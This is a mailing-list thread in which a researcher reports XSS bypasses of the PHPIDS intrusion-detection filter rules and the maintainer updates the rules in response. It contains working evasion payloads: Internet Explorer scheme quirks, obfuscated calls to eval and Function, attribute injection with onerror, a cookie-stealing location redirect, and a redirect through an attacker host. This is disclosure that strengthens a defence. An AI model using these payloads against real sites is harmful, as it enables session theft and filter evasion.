There are some characteristics in internet explorer that could aid
attackers when doing XSS attacks.
In IExplorer:
??script:
and
???script:
are translated to vbscript:
so, for example:
MYscript:msgbox("hi")
or
YOUscript:msgbox("hi")
will be treated as:
vbscript:msgbox("hi")
and anything with:
????script:
will be treated as:
javascript:
so..
somescript:alert("hi");
will be treated as:
javascript:alert("hi");
About PHPIDS:
The following expression is not filtered:
document.location.search.substr(1)
document.location.search returns the variables sent as GET content.
The website:
http://site.com/?something here
document.location.search returns "something here"
There is not filter for document.referrer:
document.referrer.substr(32)
So for example, I could make a website:
http://www.attacker.com/red.php?code-here()
that redirects to the vulnerable site and the program would execute
"code-here()".
!!! --- The filter doesnt make any validation for VBScript. --- !!!
About the rule:
rule: (?:(?:location)?[. ]*hash[. ]*(?:substr(?:ing)?|replace)\s?\()
rule-description: detects self contained xss payload attacks
impact: 4
Ways of avoiding that rule:
document.location.hash.split(document.location.hash.charAt(0)).join()
document.location.hash[String().substr.toString().substr(9,6)](1)
About the rule:
rule: (?:(?:alert|prompt|confirm|dialog|expression|urn|fromCharcode|
decodeURIComponent...
rule-description: detects possible includes and typical script
methods
impact: 5
Ways of avoiding that rule:
window[eval.toString().substr(9,4)](--code_here--)
Function(--code_here--)();
Use of both vulnerabilities, for example:
Function(document.location.hash[String().substr.toString().substr(9,6)]
(1))();
Could led to running the code inside http://site.com/#code-here
:)
Greetz!!
Att.
sirdarckcat
Welcome to the group and thanks a lot! I will review the suggestions
immediately and upgrade the filter rules. (Wow - I didn't know about
the ???script issue!)
Greetings,
.mario
> Could led to running the code insidehttp://site.com/#code-here
>
> :)
> Greetz!!
>
> Att.
> sirdarckcat
Ok - after having stopped shivering I customized the rules and
deployed them to the smoketest. Thanks for the awesome input - very
much appreciated!
Greetings,
.mario
Thanks for the welcome :)
there is another flaw in php-ids filters, this string:
x' y" z" awesome"whatever='something'
will allow me to put anything inside any attribute:
If you see the generated DOM code (in firefox), you can see that:
<a href="x' y" z" awesome"whatever='something'">
and
<a href='x' y" z" awesome"whatever='something''>
and
<a href=x' y" z" awesome"whatever='something'>
will be translated to:
double quoted:
<a href="?test=x%27%20y" z="" awesome="" whatever="something">
single quoted:
<a href="?test=x" y="" z="" awesome="" whatever="something">
no quotes:
<a href="?test=x%27" y="" z="" awesome="" whatever="something">
the important part is:
whatever="something"
I cant put onclick, nor onmousemove, etc.. but I thing that using
style could led to exploiting.. I'm not really sure..
anyway, if the affected zone instead of being an <a href were <img, I
think I could exploit it successfully.
This may be useful for the XSS cheat list of rsnake..
Greetz!!
the use of "with" is not filtered:
with(document)location.href=cookie;
Greetz!!
Thanks again for your great work - it's a bgreat benefit for the group
to have you aboard!
I just fixed the filter rules and uploaded them for the demo. As far
as I can see they now cover all problems appearing in the slackers
forum and this thread.
x' y" z" awesome"onerror='alert(1)' is now triggering an impact of 13
which i find suitable.
Also the pattern foo(bar), foo["bar"], foo().bar(), and new Function
foo("bar") are now covered - I hope that doest it for now ;)
Also I tried to fix the with() issue more effectively although this
rule need more work.
Greetings!
.mario
I'm having a lot of fun with this filters :P, is the best challenge
I've seen in a long time
there is another flaw, this is an error in the handling of the new
lines..
for example:
for each(screw
in window)try{screw(code
)}catch(rock_and_roll){1}
after a lot of alerts, and confirms, the function "eval" will be
reached.. and will execute the code inside the variable code.
The variable code may be inputed like this:
var code;
code + = "alert";
code + = "\
(";
code + = "document";
code + = ".";
code + = "cookie";
code + = " \
); 123456 ";
Greetz!!
"I'm having a lot of fun with this filters :P, is the best challenge
I've seen in a long time"
Nice to hear - thanks!
Again very high quality and esoteric stuff! The for each() construct
is now being detected but the concatenation makes me headache... What
do you guys think - would it be useful to create a concatenation
converter?
Greetings,
.mario